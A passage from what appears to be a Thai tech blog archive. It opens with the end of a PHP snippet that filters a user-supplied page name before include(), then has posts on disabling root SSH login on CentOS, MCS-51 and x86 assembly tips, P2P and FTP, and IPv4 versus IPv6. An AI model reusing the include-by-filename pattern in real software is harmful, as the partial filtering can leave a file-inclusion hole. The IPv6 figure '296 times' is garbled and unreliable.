$page = array_pop($page); //เอาเฉพาะ filename *index สุดท้าย
if(file_exists($page))
include($page);
จะเห็นว่าเราสามารถกรองได้หลากหลายวิธีมาก แต่ส่วนใหญ่มักจะขี้เกียจ หรือสะเพร่าไปในบางจุด
ทั้งนี้ต้องดูลักษณะงาน แล้วใช้ให้เหมาะสม จะดีที่สุดครับ

บทความจาก : http://code32bit.blogspot.com

SSH คืออะไร? และ วิธีป้องกัน root ssh

2013-11-18T21:29:00.000+07:00

SSH (Secure Shell)

SSH (Secure Shell) คือ Network Protocal ที่สามารถแลกเปลี่ยนข้อมูลโดยช่องทางที่ปลอยภัย (Secure Channel) ระหว่างอุปกรณ์เครือข่ายสองตัว ใช้ Linux หรือ Unix เป็นระบบปฏิบัตการพื้นฐานในการเข้าถึงบัญชีผู้ใช้ (Shell Accounts) ซึ่ง SSH ได้รับการออกแบบให้มาแทนการ Telnet, Rlogin, RSH (The remote shell) ด้วยเหตุผลทางด้านความปลอดภัย การส่งข้อมูลจะอยู่ในรูปแบบตัวอักษร (Plaintext) ที่มีการเข้ารหัสข้อมูล (Encryption) เพื่อให้ข้อมูลเป็นความลับและให้สามารถส่งข้อมูลผ่านเครือข่าย Internet ได้อย่างสมบูรณ์ สามารถใช้งาน SSH ผ่านโปรแกรมประยุกต์ (Applications) ได้มากมายบนระบบปฏิบัติการ UNIX, Microsoft Windows, Apple Mac และ Linux โปรแกรมประยุกต์ (Applications)

ตัวอย่างการใช้งาน SSH ผ่านโปรแกรม PuTTY ในระบบปฏิบัติการ Microsoft Windows 7

จาก: http://www.sutenm.com

ป้องกัน root ssh บน centos

วิธีการ Set SSH ไม่ให้ root login เข้ามา
วันนี้จะมาสอน security เบื้องต้นของ linux

นั่นคือ การไม่ให้ Root Access เครื่องโดยตรง แต่ต้องผ่าน user คนอื่นก่อน

มาดูวิธีกันเลยดีกว่า

[root@valkyrie ~]# useradd
เพื่อสร้าง user ใหม่ครับ ใช้ในการที่เอาไว้ login ssh แทน root

[root@valkyrie ~]# passwd
ทีนี้ก็กำหนด Password ให้มันครับ (แนะนำให้คนละอันกับ root)

[root@valkyrie ~]# vi /etc/ssh/sshd_config
เข้าไปแก้ไข sshd_config ครับ
ตั้ง PermitRootLogin เป็น no
ซึ่งในตอนแรก มันจะปรับเป็น yes แล้ว comment ด้วย # ไว้ เอาออกด้วยนะครับ
แล้วเลื่อนลงมาล่างสุดครับ ให้พิมพ์บรรทัดนี้เพิ่มเข้าไป
AllowUsers
แล้ว save ไฟล์ ปิด ออกมานะครับ

ทีนี้ สั่ง service sshd restart เพื่อสั่งรี service sshd

ระหว่างนี้ ห้ามปิด SSH นี้ก่อนนะครับ เพราะเรายังไม่รู้ว่า config ที่เราใช้ มีปัญหาทำให้ login ไม่ได้หรือไม่
ถ้าไม่ทดสอบก่อน อาจจะต้องเดินไปแก้ไฟล์หน้าเครื่องได้นะครับ เพราะจะ ssh ไม่ได้อีกเลย
ดังนั้นให้เปิด terminal ssh เข้าไปยัง server อีกครั้งนะครับ แล้วลอง login ด้วย root ดู
จะพบว่า มัน login ไม่ได้
ให้ปิด terminal นั้นแล้วเปิด ssh ไปอีกหน้าหนึ่ง แล้วทดสอบ login ด้วย user ที่เราสร้างไปเมื่อตอนแรก
ถ้าได้ ก็ ok ครับ ฉลุย ผ่าน

ถ้าเราต้องการใช้สิทธิ Root
คือเนื่องจาก user ที่สร้างใหม่นั้น มันจะไม่มีสิทธิเทียบเท่า Root ดังนั้น วิธีการที่จะทำให้เราเข้าไปใน Root ได้ นั่นคือคำสั่ง
[newusers@valkyrie ~]$ su -
มันจะให้พิมพ์ password root เราก็พิมพ์ root

เครดิตจำไม่ได้ต้องขอโทษทีนะครับ

ภาษา Assembly คืออะไร? และ การเขียนโปรแกรมด้วยภาษา Assembly

2013-11-09T17:15:00.001+07:00

ภาษาแอสเซมบลี (อังกฤษ: Assembly Language) หมายถึง ภาษาที่ใช้ในการเขียนโปรแกรมภาษาหนึ่งซึ่งจะทำงานโดยขึ้นกับรุ่นของไมโครโพรเซสเซอร์ หรือ "หน่วยประมวลผล" (CPU) ของเครื่องคอมพิวเตอร์
การใช้ภาษาแอสเซมบลีจำเป็นต้องผ่านการแปลภาษาด้วยคอมไพเลอร์เฉพาะเรียกว่า แอสเซมเบลอร์ (assembler) ให้อยู่ในรูปของรหัสคำสั่งก่อน (เช่น .OBJ) โดยปกติ ภาษานี้ค่อนข้างมีความยุ่งยากในการใช้งาน และการเขียนโปรแกรมเป็นจำนวนบรรทัดมากมากกว่า เมื่อเปรียบเทียบกับการใช้ภาษาระดับสูง เช่น ภาษา C หรือภาษา BASIC แต่จะทำให้ได้ผลลัพธ์การทำงานของโปรแกรมเร็วกว่า และขนาดของตัวโปรแกรมมีขนาดเนื้อที่น้อยกว่าโปรแกรมที่สร้างจากภาษาอื่นมาก จึงนิยมใช้ภาษานี้เมื่อต้องการประหยัดเวลาทำงานของเครื่องคอมพิวเตอร์ และเพิ่มประสิทธิภาพของโปรแกรม
เนื่องจากตัวคำสั่งภายในภาษาอ้างอิงเฉพาะกับรุ่นของหน่วยประมวลผล ดังนั้นถ้ามีการเปลี่ยนแปลงไปใช้กับหน่วยประมวลผลอื่นหรือระบบอื่น (เช่น หน่วยประมวลผล x86 ไม่เหมือนกับ z80) จะต้องมีการปรับแก้ตัวคำสั่งภายในซึ่งบางครั้งอาจไม่สามารถปรับปรุงแก้ไขได้อย่างสมบูรณ์

การพัฒนางานทางด้านไมโครคอนโทรลเลอร์ด้วยภาษา Assembly นั้น ถือว่ายังเป็นที่นิยมอยู่มาก
ในบ้านเรา เรียกได้ว่าเป็นส่วนใหญ่เลย ในขณะที่ต่างประเทศนั้น ภาษา Assembly จะนิยมรอง
ลงมาจากภาษา C ที่ใช้กันเป็นอันดับหนึ่ง อาจจะเป็นเพราะว่าความคุ้นเคย หรือเพราะความตรง
ไปตรงมาของภาษา Assembly ที่เป็นจุดเด่นอย่างหนึ่งก็ได้ ไม่ว่าจะอย่างไรก็ตาม การเข้าถึง
ภาษา Assembly ได้นั้น ถือว่าเป็นการเรียนรู้และเข้าใจได้ลึกซึ้งที่สุด และถ้ารู้จักนำมาประยุกต์
ใช้งานให้เหมาะสมแล้ว ก็จะเป็นประโยชน์ต่อการพัฒนาเทคโนโลยีต่าง ๆ เป็นอย่างมาก
สำหรับชิพตระกูล MCS-51 นั้น (ขอย้ำ ... ตระกูลครับ ... ไม่ใช่เบอร์ 51 ... แต่มากันเป็นร้อย ๆ เบอร์)
จากประสบการณ์ที่ได้สะสมมา พอจะสรุปเป็นประเด็นต่าง ๆ ได้ 10 ประเด็น ที่นักพัฒนาทั้งหลาย
ควรจะจดจำไว้ให้แม่น เพื่อจะช่วยให้การพัฒนาเป็นไปได้อย่างไม่ติดขัด ... ดังนี้ครับ

1. Internal RAM พื้นที่ยุทธศาสตร์
MCS-51 ถูกออกแบบให้มี Internal RAM ภายใน 128 Byte (เบอร์ 8051) หรือ 256 Byte (เบอร์ 8052)
และนี่เป็นความตั้งใจของผู้ผลิตที่จะให้ใช้พื้นที่ส่วนนี้เพื่อการทำงานต่าง ๆ คือเป็น Working Area ไม่ว่าจะ
เป็นส่วน Register, Stack, และ Buffer ชุดคำสั่งเกือบจะทั้งหมดจะกระทำกับ Internal RAM นี้ ถ้าเรา
จะพยายามใช้ส่วนของ External RAM เป็นพื้นที่ในรูปแบบ Working Area ก็จะเป็นเรื่องที่ยุ่งยากเกินไป
ส่วน External RAM เหมาะสำหรับการเก็บข้อมูลแบบต่อเนื่อง หรือทำเป็น Buffer จำนวนมาก ๆ เท่านั้น
เพราะเนื่องจากมีคำสั่งที่ใช้งานได้ไม่กี่คำสั่ง เช่น MOVX A,@DPTR ในส่วน Internal RAM นั้น เรา
สามารถใช้งานโดยตรงได้โดยไม่ต้องใช้ Register ให้ยุ่งยากเลย ตัวอย่างเช่น

MOV COUNT,#18H
LOOP: ...
...
...
DJNZ COUNT,LOOP

ในที่นี้ COUNT คือชื่อที่อ้างถึงพื้นที่ Internal RAM ที่กำหนดจากคำสั่ง EQU หรือ DS อีกที สังเกตุว่าเรา
ใช้งานได้เสมือนกับเป็น Register R0-R7 เลย อีกประเด็นหนึ่งที่เกี่ยวกับ Internal RAM ก็คือ การอ้าง
ถึงพื้นที่ RAM ตั้งแต่ Address 80-FFH (เบอร์ 8052) ซึ่งมี Address ซ้อนทับกับส่วน SFR 80-FFH ด้วย
จะต้องแยกด้วยคำสั่งที่ใช้งาน ถ้าเป็นกรณีอ้างถึง RAM ที่ตำแหน่ง A0H จะต้องใช้คำสั่งแบบ Indirect ดังนี้

MOV R0,#0A0H
MOV A,@R0

แต่ถ้าเป็นกรณีอ้างอิงถึง SFR ที่ตำแหน่ง A0H เช่นกัน จะต้องใช้คำสั่งแบบ Direct ดังนี้

MOV A,0A0H

2. ระบบ Stack และการเรียงข้อมูล
ระบบ Stack ของ MCS-51 จะเป็นแบบนับขึ้น โดยมีค่าเริ่มต้นหลังจาก Reset เป็น 07H เสมอ ถ้ามีการใช้
คำสั่ง PUSH หรือ CALL ค่า Stack จะเพิ่มขึ้นก่อน แล้วจึงเก็บข้อมูลลงไป ซึ่งก็จะเป็น Address 08H เป็น
ตัวแรก ระบบ Stack สามารถโยกย้ายไปที่ใดก็ได้ใน Internal RAM ซึ่งรวมไปถึงส่วน Address 80-FFH
ด้วย โดยจะไม่ปะปนกับส่วน SFR แต่อย่างใด ... ส่วนการเรียงลำดับข้อมูลขนาด 16 บิทในคำสั่งต่าง ๆ
จะเรียงจาก High ไป Low เสมอ เช่นการใช้คำสั่ง LJMP ไปที่ Address 87FFH จะแปลงเป็น Op-Code
คือ 02H,87H,FFH

3. ชื่อ Register หรือ Bit ... กำหนดให้ถูกกับการใช้งาน
ใน MCS-51 จะมีมุมมองจากจุดต่าง ๆ กัน เพราะฉะนั้นจะมีชื่ออ้างอิงที่ต่างกันด้วย ทั้งนี้การที่ผู้ผลิตชิพ
ออกแบบไว้อย่างนี้ ก็เพื่อให้ชุดคำสั่งใช้ได้อย่างมีประสิทธิภาพโดยไม่สับสน ชื่อจะมีอยู่ 3 แบบ คือ

ชื่อเฉพาะ เช่น A, R2, C(Carry), DPTR
ชื่อ Bit เช่น INT1, T0, T1, CY(Carry)
ชื่อ SFR (Special Function Register) เช่น ACC, B, DPH, P1, PSW, TCON

ชื่อทั้ง 3 กลุ่มนี้ บางตัวก็คือตัวเดียวกัน แต่มองจากคนละมุม เช่น A และ ACC , C และ CY ทั้งนี้เพื่อ
ให้เข้ากับชุดคำสั่งของแต่ละประเภท ตัวอย่างเช่น คำสั่ง PUSH จะกำหนดให้ตามด้วยชื่อแบบ Direct
เพราะฉะนั้นจะต้องใช้เป็น PUSH ACC จะใช้เป็น PUSH A ไม่ได้ ชื่อ Direct ในที่นี้ยังหมายถึงชื่อ
ที่เรากำหนดเองก็ได้จากคำสั่ง DS หรือ EQU ด้วย อีกตัวอย่างเช่น คำสั่ง JB bit,rel ถ้าเราใช้เป็น
JB CY,rel ก็จะทำงานเหมือนคำสั่ง JC rel เช่นกัน โดยมี Op-Code ที่แตกต่างกัน ทั้งนี้ CY จะเป็นชื่อ
ที่มองในฐานะของ Bit Address ส่วน C จะเป็นชื่อที่เป็นรูปแบบของคำสั่งไปเลย เราจะต้องเข้าใจ
คำสั่งแต่ละคำสั่งให้ชัดเจน จึงจะสามารถอ้างอิงได้ถูกต้องตามขบวนท่า นอกจากนี้ ชื่อ SFR ยังมี
ความสามารถในการใส่จุดหลังชื่อได้อีก ซึ่งจะทำให้เรียกใช้งานได้ในหลายรูปแบบ ตัวอย่างเช่น
P3.3 จะเหมือนกับ INT1 (คือ SFR ชื่อ P3 บิทที่ 3) , PSW.7 จะเหมือนกับ CY นั่นเอง

4. Boolean Processor ต้องใช้ให้คุ้ม
MCS-51 มีความสามารถในเรื่องบิทที่ดีมาก ซึ่งจะต้องนำมาใช้ประโยชน์ให้คุ้มค่า โดยเฉพาะอย่างยิ่ง
ในเรื่องของการกำหนด Flag ต่าง ๆ พื้นที่ใน Internal RAM ส่วนหนึ่งคือ 20-2FH (16 Byte,128 Bit)
และพื้นที่ SFR ที่มี Address ลงท้ายด้วย 0 และ 8 จะสามารถอ้างอิงถึงในระดับบิทได้ เปรียบเสมือนมี
Register 1 บิท ซึ่งนำมาเปรียบเทียบได้ , move ได้ , กำหนดให้เป็น 0 หรือ 1 ได้ รวมทั้งทำการ Jump
ตามค่าบิทนั้น ๆ ได้ด้วย การใช้งาน MCS-51 โดยไม่ได้ใช้คำสั่งเกี่ยวกับบิทเลย คงจะเป็นเรื่องแปลก
ทีเดียว

5. ใช้ Registor ขนาด 16 บิทอย่างเหมาะสม
หลายคนคงรู้สึกอึดอัดใจกับ MCS-51 ในเรื่องการอ้างอิง Address แบบ 16 บิท ซึ่งมี DPTR เพียงตัวเดียว
และยังทำการ Increment ได้อย่างเดียว โดยไม่สามารถ Decrement ได้ ในเรื่องนี้ถ้าเราใช้ External
RAM เพื่อการเก็บข้อมูลอย่างเหมาะสม ก็จะไม่รู้สึกถึงปัญหานี้แต่อย่างใด MCS-51 ได้ออกแบบโดยให้
ใช้งานที่ Internal RAM เป็นหลัก เพราะฉะนั้นไม่ต้องคิดมาก พยายามใช้งานให้สอดคล้องตามที่เขาออก
แบบมา ... สบายมาก

6. อักษรที่ต้องจำให้ขึ้นใจ (# และ @)
ในภาษา Assembly ของ MCS-51 อักษรทั้ง 2 ตัวนี้จะพบบ่อย ๆ และมักจะทำให้ผู้เริ่มสับสนได้พอสมควร
อักษร # จะใช้แทนค่าคงที่ เช่น คำสั่ง MOV A,#40H คือการนำค่า 40H เก็บไว้ใน Register A ถ้าไม่ได้ใส่
อักษร # ไว้ก็จะเป็น MOV A,40H ซึ่งจะมีการทำงานไปคนละเรื่องเลย คือการนำค่าจาก Internal RAM
ตำแหน่งที่ 40H ไปไว้ใน Register A ส่วนอักษร @ จะใช้ในความหมายของ In-direct คือการอ้างถึง
หน่วยความจำผ่านทาง Register อีกที เช่น MOV A,@R0 คือการนำค่าใน Internal RAM ที่ถูกชี้ด้วย R0
มาเก็บไว้ใน Register A หรือเช่น MOVX A,@DPTR คือการนำค่าใน Data Memory ที่ถูกชี้ด้วย DPTR
มาเก็บไว้ใน Register A

7. คำสั่งที่อาจจะสับสนได้
คำสั่งของ MCS-51 หลายคำสั่งที่ให้ความหมายไม่เหมือนกับคำสั่งของชิพตระกูลอื่น ๆ (โดยเฉพาะ Z80)
ซึ่งอาจจะทำให้สับสนได้ (ใครทำให้ใครสับสนก็ไม่รู้) พอจะรวบรวมได้ดังนี้ ...

คำสั่ง RLC และ RL หมายถึงการ Rotate Left แบบผ่าน Carry และไม่ผ่าน Carry ตามลำดับ
(Z80 จะให้ความหมายตรงข้ามกันเลย)

คำสั่ง JNZ และ JZ หมายถึงการกระโดดไป เมื่อ A ไม่เท่ากับ 0 และ A เท่ากับ 0 ตามลำดับ
สำหรับ MCS-51 จะตรวจสอบจากค่า A โดยตรง คือไม่ได้มี Zero flag เหมือน Z80 เพราะฉะนั้น
จะใช้ที่จุดใด ต้องแน่ใจว่าก่อนหน้านั้นมีการกระทำกับ Register A เสียก่อน

คำสั่ง SUBB หมายถึงคำสั่งลบเลข โดยใน MCS-51 จะสนใจค่า Carry ด้วยเสมอ คือถ้าเป็นการ
เริ่มต้นลบ จะต้องทำการ Clear Carry (CLR C) ก่อนเสมอ

คำสั่ง CJNE หมายถึงการ Compare ซึ่งจะทำการกระโดดไป เมื่อค่าไม่เท่า แต่ถ้าจะกระทำการ
เปรียบเทียบในเชิงค่ามากกว่า,น้อยกว่า ก็ทำได้เช่นเดียวกัน โดยการให้กระโดดไปยังบรรทัดต่อไป
และใช้คำสั่ง JNC และ JC ได้ตามต้องการ (ไม่สามารถใช้ JNZ และ JZ ได้) ตัวอย่างเช่น

CJNE A,B,$+3 (อักษร $+3 เป็นการบอกให้ตัวแปลรับรู้ โดยอ้างถึงตำแหน่ง ณ คำสั่งนี้ บวกไปอีก 3 Byte)
JNC ... ให้กระโดดไปที่ ... ถ้า A < B
หรือ
JC ... ให้กระโดดไปที่ ... ถ้า A => B

8. Interrupt ... เลือกใช้ให้เหมาะสม
เนื่องจาก MCS-51 มีโครงสร้างการ Interrupt ให้ใช้จากแหล่งหลาย ๆ อย่าง จึงทำให้ผู้เขียนโปรแกรมมีทาง
เลือกวิธีการใช้ได้มากขึ้นด้วย อย่างไรก็ตาม ใน Interrupt Routine จะต้องพยายามทำให้กระชับ และทำงาน
อย่างรวดเร็วที่สุดเท่าที่จะทำได้ ทั้งนี้ในระหว่างที่ทำงานอยู่ใน Interrupt Routine นี้ ถ้าเกิดมีกรณีการ
Interrupt ซ้อนกันอีกครั้ง ระบบจะไม่ตอบสนองการ Interrupt นั้น ๆ จนกว่าจะจบการทำงานของ Routine
ที่มีกำลังทำอยู่ (คือเจอคำสั่ง RETI) การ Interrupt ซ้อนกัน 1 ครั้งจะไม่มีปัญหาใด ๆ กับระบบ เพราะ MCS-51
จะยังคงตอบสนองได้ครบถ้วน แต่ถ้ามีการ Interrupt ซ้อนกันมากกว่า 1 ครั้ง (หมายถึงจากแหล่งเดียวกัน)
ก็จะทำให้การตอบสนองผิดพลาดไปได้

9. P0,P1,P2,P3 ... ใช้เป็น Active Low ให้หมด
เมื่อเปิดไฟเข้าระบบ หรือเมื่อทำงาน Reset ตัว MCU แล้ว ขาสัญญานทั้ง 4 Port จะมีสถานะเป็น 1 เสมอ
เพราะฉะนั้น ถ้ามีการนำขาสัญญานไปขับวงจรใด ๆ แล้ว ต้องคำนึงเสมอว่าให้วงจรทำงานแบบ Active Low
คือทำงานเมื่อเป็น 0 เช่นถ้านำไปขับวงจร Relay วงจรนี้จะทำให้ Relay ON เมื่อเป็น 0 ด้วยการออกแบบ
ที่ถูกต้องนี้ จะช่วยให้งานมีความสมบูรณ์ในการใช้งานเป็นอย่างดี

10. ไมโครคอนโทรลเลอร์ ก็คือ ไมโครคอนโทรลเลอร์
ความหมายของข้อนี้ก็คือ ให้ไมโครคอนโทรลเลอร์ทำงานของมันอย่างที่ควรเป็น ถ้าจะทำระบบที่ซับซ้อนมาก ๆ
หรือมีการเก็บข้อมูลอย่างมหาศาล หรือมีความเร็วสูงแบบไม่เห็นฝุ่น บางทีอาจจะต้องทบทวนก่อนว่า ระบบ
ไมโครคอนโทรลเลอร์จะสามารถทำได้อย่างที่ต้องการหรือไม่ เพราะชื่อของมันก็บอกอยู่แล้วว่า สำหรับการ
Control หรือการควบคุมนั่นเอง การนำไปใช้กับระบบที่เกินขอบเขตของมัน อาจจะต้องแยกงานเป็นส่วน ๆ
และใช้ MCU หลาย ๆ ตัวช่วยกันทำงาน หรืออาจจะออกแบบให้ทำงานร่วมกับเครื่อง PC หรือถ้ายังไม่ไหว
ก็เปลี่ยนไปใช้ MCU ที่มีขนาดใหญ่ ๆ ตามไปด้วยเลยจะดีกว่า ...

ตัวอย่างโค้ดโปรแกรม

org 100h
; set video mode    
mov ax, 3     ; text mode 80x25, 16 colors, 8 pages (ah=0, al=3)
int 10h       ; do it!
; cancel blinking and enable all 16 colors:
mov ax, 1003h
mov bx, 0
int 10h
; set segment register:
mov     ax, 0b800h
mov     ds, ax
; print "hello world"
; first byte is ascii code, second byte is color code.
mov [02h], 'H'
mov [04h], 'e'
mov [06h], 'l'
mov [08h], 'l'
mov [0ah], 'o'
mov [0ch], ','
mov [0eh], 'W'
mov [10h], 'o'
mov [12h], 'r'
mov [14h], 'l'
mov [16h], 'd'
mov [18h], '!'
; color all characters:
mov cx, 12  ; number of characters.
mov di, 03h ; start from byte after 'h'
c:  mov [di], 11101100b   ; light red (1100) on yellow (1110)
    add di, 2 ; skip over next ascii code in vga memory.
    loop c
; wait for any key press:
mov ah, 0
int 16h
ret

ที่มา : http://th.wikipedia.org/

P2P (Peer to Peer) และ FTP คืออะไร

2013-10-31T20:35:00.001+07:00

P2P (Peer to Peer) คืออะไร

ในตอนนี้หลายๆคนคงได้ยินคำว่า "Bit","Torrent","P2P" ฯลฯ จากที่อื่นๆ และก็คงสงสัยว่า
ไอเจ้าพวกนี้มันคืออะไรทำงานอย่างไร และมันวิเศษวิโสอย่างไร ทำไมถึงมีการพูดถึงกันนักหนา
วันนี้เราจึงจะมาทำความรู้จักมันกันครับแต่ที่สำคัญก่อนอื่นเลยเราต้องมารู้จักกับคำว่า "P2P" กันก่อนครับ
P2P หรือเต็มๆ Peer to Peer อาจจะมีคำอื่นอีกเช่น People to People ,Point to Point ซึ่งมีความหายคล้ายคลึงกัน
Peer to Peer คือ ...
- ระบบที่อนุญาติให้ผู้ใช้สามารถแลกเปลี่ยนไฟล์ระหว่างกันหรือใช้ทรัพยากรร่วมกันผ่านระบบเครือข่าย
- ระบบการสื่อสารจากคอมพิวเตอร์เครื่องหนึ่งไปยังอีกเครื่องหนึ่งโดยตรง
- ฯลฯ
แต่เดิมนั้นเมื่อเราต้องการดาวน์โหลดไฟล์จากแม่ข่ายโดยใช้ FTP*,HTTP** นั้น
หากมีคนที่ต้องการไฟล์เดียวกับเรา 500 คนมาดาวน์โหลดบนแม่ข่ายเดียวกันพร้อมๆ กันโดยแต่ละคนมี Bandwidth คนละ 256kbps
ถ้าจะให้ทุกคนนั้นได้ความเร็วในการดาวน์โหลดสูงสุดตัวแม่ข่ายจะต้องมี Bandwidth เท่ากับ 256kbps * 500 (125mbit) เลยทีเดียว

ซึ่งไม่ใช่เพียงแต่จะเปลือง Bandwidth เท่านั้น แต่ยังจะต้องใช้แม่ข่ายที่มีความเร็วในการประมวลผลสูงเพื่อรองรับความต้อง การที่เพิ่มขึ้นอีกด้วย
จากปัญหาดังกล่าวนี้เองทำให้โปรแกรมแชร์ไฟล์ P2P ถูกพัฒนาขึ้นมารองรับความต้องการที่เพิ่มขึ้นโดยใช้ทรัพยากรของแม่ข่ายให้ น้อยลงนั้นเอง
ระบบ P2P นั้นถูกพัฒนาเพื่อใช้ในการแลกเปลี่ยนไฟล์ระหว่างกันโดยที่ไม่พึ่งแม่ข่ายใน การแจกจ่ายไฟล์และทำให้สามารถหาไฟล์ที่ต้องการได้ง่ายขึ้น
*FTP = File Transfer Protocal
**HTTP = Hypertext Transfer Protocal

จากความหมายนี้เองทำให้เราเรียกโปรแกรมที่ใช้ในการแลกเปลี่ยนไฟล์ระหว่างกันโดยไม่ได้ร้องขอไฟล์จากแม่ข่ายว่า "P2P File Sharing"
โปรแกรมประเภทนี้มีอยู่มากมายหลายตัวด้วยกัน เช่น Emule, Kazaa, Edonkey ฯลฯ หลักการทำงานคร่าวๆของโปรแกรมก็คือ
1.เชื่อมต่อไปยังแม่ข่ายเพื่อยืนยันตัวตนและส่งสารบัญไฟล์ที่เราแชร์ไว้ไปด้วย
2.หากเราต้องการหาไฟล์สักไฟล์หนึ่งเมื่อเราระบุ Keyword** โปรแกรมจะส่งคำร้องไปยังแม่ข่าย
จากนั้นแม่ข่ายจะส่งรายชื่อไฟล์พร้อมข้อมูลตัวตนของคนที่มีไฟล์ที่ตรงกับ Keyword ที่เราระบุกลับมา
3.เมื่อเราพบไฟล์ที่ต้องการแล้วตัวโปรแกรมจะใช้ข้อมูลที่ได้จากแม่ข่ายติดต่อไปยังคนนั้นๆโดยตรงเพื่อร้องขอไฟล์
จากการทำงานจะเห็นได้ว่าตัวแม่ข่ายนั้นไม่ได้เป็นคนเก็บไฟล์จริงๆไว้เพียงแต่เก็บเป็นสารบัญไว้เท่านั้น
**Keyword = คำหรือประโยคหรือที่ระบุเพื่ออ้างอิงในระบบการค้นหา

FTP คืออะไร

FTP ย่อมาจาก File Transfer Protocol คือ โปรโตคอลเครือข่ายชนิดหนึ่ง ถูกนำใช้ในการถ่ายโอนไฟล์ ระหว่างเครื่องคอมพิวเตอร์ อย่างการถ่ายโอนไฟล์ระหว่าง ไคลเอนต์ (client) กับเครื่องคอมพิวเตอร์ที่เป็นแม่ข่าย เรียกว่า โฮสติง (hosting) หรือ เซิร์ฟเวอร์ ซึ่งทำให้การถ่ายโอนไฟล์ง่ายและปลอดภัยในการแลกเปลี่ยนไฟล์ผ่านอินเตอร์เน็ต การใช้ FTP ที่พบบ่อยสุด ก็เช่น การดาวน์โหลดไฟล์จากอินเทอร์เน็ต ความสามารถในการถ่ายโอนไฟล์ ทำให้ FTP เป็นสิ่งจำเป็นสำหรับทุกคนที่สร้างเว็บเพจ ทั้งมือสมัครเล่นและมืออาชีพ โดยที่การติดต่อกันทาง FTP เราจะต้องติดต่อกันทาง Port 21 ซึ่งก่อนที่จะเข้าใช้งานได้นั้น จะต้องเป็นสมาชิกและมีชื่อผู้เข้าใช้ (User) และ รหัสผู้เข้าใช้ (password) ก่อน และโปรแกรมสำหรับติดต่อกับแม่ข่าย (server) ส่วนมากจะใช้โปรแกรมสำเร็จรูป เช่น โปรแกรม Filezilla,CuteFTP หรือ WSFTP ในการติดต่อ เป็นต้น
FTP แบ่งเป็น 2 ส่วน
1. FTP server เป็นโปรแกรมที่ถูกติดตั้งไว้ที่เครื่องเซิฟเวอร์ ทำหน้าที่ให้บริการ FTP หากมีการเชื่อมต่อจากไคลแอนเข้าไป
2. FTP client เป็นโปรแกรม FTP ที่ถูกติดตั้งในเครื่องคอมพิวเตอร์ของ user ทั่วๆไป ทำหน้าที่เชื่อมต่อไปยัง FTP server และทำการอัพโหลด ,ดาวน์โหลดไฟล์ หรือ จะสั่งแก้ไขชื่อไฟล์, ลบไฟล์ และเคลื่อนย้ายไฟล์ก็ได้เช่นกัน
ความสำคัญของ FTP
โดยปกติเมื่อเราต้องการทำเว็บไซต์ไม่ว่าด้วยจุดประสงค์ใดก็ตาม สิ่งที่เราจะต้องนึกถึงและขาดไม่ได้คือ Hosting หรือ Server ซึ่งในปัจจุบันมีผู้ให้บริการอยู่เป็นจำนวนมาก การที่เว็บไซต์ของเราสามารถให้บริการได้ตลอด 24 ชั่วโมง โดยไม่มีหยุดนั้น ก็เพราะ Hosting ไม่เคยปิดนั่นเอง ส่วนการสร้างเว็บไซต์เกิดจากการเขียน Code โปรแกรม ไม่ว่าจะเขียนด้วยภาษา HTML , PHP , ASP , ฯลฯ ล้วนแล้วแต่ต้องนำไฟล์ที่เราเขียนเสร็จเรียบร้อยไปใส่บน Hosting เพื่อสามารถให้บริการได้ตลอด 24 ชั่วโมง 365 วัน แต่ด้วยหนทางที่อยู่ไกลกันระหว่างเรากับ Hosting ที่เราขอใช้บริการไว้ เราจึงต้องใช้เทคโนโลยีของคอมพิวเตอร์ ในการโอนย้ายไฟล์ระหว่างเครื่องคอมพิวเตอร์ของเรา กับ Hosting ซึ่งเทคโนโลยีนั้นคือ FTP นั่นเอง

ความแตกต่างระหว่าง IPV4 กับ IPV6

2013-10-30T06:56:00.001+07:00

IPV4 และ IPV6 คืออะไร

IPv4 คืออะไร

IPv4 คือ หมายเลข IP address มีขนาด 32 บิท IPv4 ย่อมาจาก "Internet Protocol Version 4 ถูกแบ่งออกเป็น 4 ชุดด้วยเครื่องหมายจุด โดยแต่ละชุดมีขนาด 8 บิท

ความแตกต่างของ IPv4 และ IPv6

การกำหนดหมายเลขของ IPv4 จะกำหนดได้น้อยกว่า IPv6 สามารถกำหนดไอพีแอดเดรส มีมากถึง 296 เท่า และความแตกต่างระหว่าง IPv6 และ IPv4 คือ การเลือกเส้นทาง ( Routing) ความปลอดภัย อุปกรณ์แปลแอดเดรส (Networl Address Translator : NAT) การลดภาระในการจัดการของผู้ดูแลระบบ และการรองรับการใช้งานในอุปกรณ์พกพา (Mobile Devices)

อินเทอร์เน็ตโพรโตคอล รุ่นที่ 6 หรือ IPv6

ปัจจุบันนี้อินเทอร์เน็ตเข้ามามีบทบาทสำคัญในชีวิตประจำวันของเรามากยิ่งขึ้นและมีเทคโนโลยีต่างๆมากมายที่จะต้องใช้อินเทอร์เน็ตในการเชื่อมต่อถึงกัน ดังในปัจจุบันเราจะเห็นได้ว่าแม้กระทั่งโทรศัพท์มือถือก็มีอินเทอร์เน็ตเป็นส่วนประกอบหนึ่งรวมไปถึงอุปกรณ์อิเล็กทรอนิกส์ต่างๆ

กลไกสำคัญในการทำงานของอินเทอร์เน็ต คือ อินเทอร์เน็ตโพรโตคอล (Internet Protocol) ซึงส่วนประกอบที่สำคัญของอินเทอร์เน็ตโพรโตคอลได้แก่ ไอพีแอดเดรส (IP address) ที่ใช้ในการอ้างอิงเครื่องคอมพิวเตอร์และอุปกรณ์เครือข่ายต่างๆ บนอินเทอร์เน็ตทั่วโลก เปรียบเสมือนการใช้งานโทรศัพท์ในการติดต่อสื่อสารกัน จะต้องมีหมายเลขโทรศัพท์เพื่อให้อ้างอิงผู้รับสายได้ คอมพิวเตอร์ทุกเครื่องในอินเทอร์เน็ตก็ต้องมีหมายเลขไอพีแอดเดรส ที่ไม่ซ้ำกับใคร

ปัจจุบันเราใช้ไอพีแอดเดรส (IP address) บนมาตรฐานของอินเตอร์เน็ตโพรโตคอลคือ Internet Protocol version 4 (IPv4) ซึ่งเราใช้เป็นมาตรฐานในการส่งข้อมูลในเครือข่ายอินเทอร์เน็ตตั้งแต่ปี ค.ศ. 1981 ทั้งนี้การขยายตัวของเครือข่ายอินเทอร์เน็ตในช่วงที่ผ่านมามีอัตราการเติบโตอย่างรวดเร็ว

